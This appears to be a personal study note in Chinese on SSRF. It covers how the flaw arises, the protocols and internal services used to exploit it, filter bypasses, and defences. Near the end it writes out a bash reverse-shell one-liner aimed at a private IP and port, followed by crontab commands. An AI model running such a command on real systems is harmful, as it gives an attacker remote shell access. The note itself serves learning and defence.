2019-11-28:ssrf基础学习,笔记
ssrf服务端请求伪造 ssrf是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞,一般情况下,ssrf访问的目标是从外网无法访问的内部系统,正式因为它是由服务端发起的,所以它能请求到它相连而外网隔离的内部系统,ssrf形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制,比如从指定的url地址获取网页文本内容,加载指定地址的图片,下载等等 ssrf利用方式 php协议,读取源码文件,需要file_get_contents gopher 弹shell dict 内网服务 file 读取当前服务器文件 http/s 执行http请求,使用http协议访问内网中的web服务 ssrf攻击应用 redis discuz fastcgi 内网应用 memcache 绕过 url混淆 ip转化为10进制 防御 限制协议只能为http,https协议 禁止30跳转 设置url白明单或限制内网ip 反弹shell:将目标服务器的终端弹到指定位置,并且需要注意弹出的shell和当前环境有关,比如使用apache服务弹出的shell是www权限 命令 bin/bash -i >& /dev/tcp/192.168.63.128/7999 0>&1 crontab -l 查看当前任务 crontab -e 添加任务 crontab -r 删除任务